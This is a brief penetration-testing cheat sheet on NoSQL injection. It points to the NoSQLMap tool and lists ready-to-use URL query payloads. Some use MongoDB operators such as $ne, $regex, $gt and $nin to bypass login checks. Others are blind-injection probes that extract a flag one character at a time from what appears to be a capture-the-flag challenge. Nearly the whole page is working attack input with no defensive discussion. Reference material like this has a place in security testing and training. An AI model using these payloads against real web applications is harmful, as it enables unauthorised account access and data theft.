NOSQL injections

NoSQLMap https://github.com/codingo/NoSQLMap

1-Set options (do this first) 2-NoSQL DB Access Attacks 3-NoSQL Web App attacks 4-Scan for Anonymous MongoDB Access x-Exit

Basic Authentication index.php?login[$regex]=a.*&pass[$ne]=lol index.php?login[$gt]=admin&login[$lt]=test&pass[$ne]=1

Basic NoSQL Injection

http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto

Blind NoSQL Injection

index.php ?chall_name=nosqlblind&flag[$regex]=.1

index.php ?chall_name=nosqlblind&flag[$regex]=3a.20

Last updated 1 year ago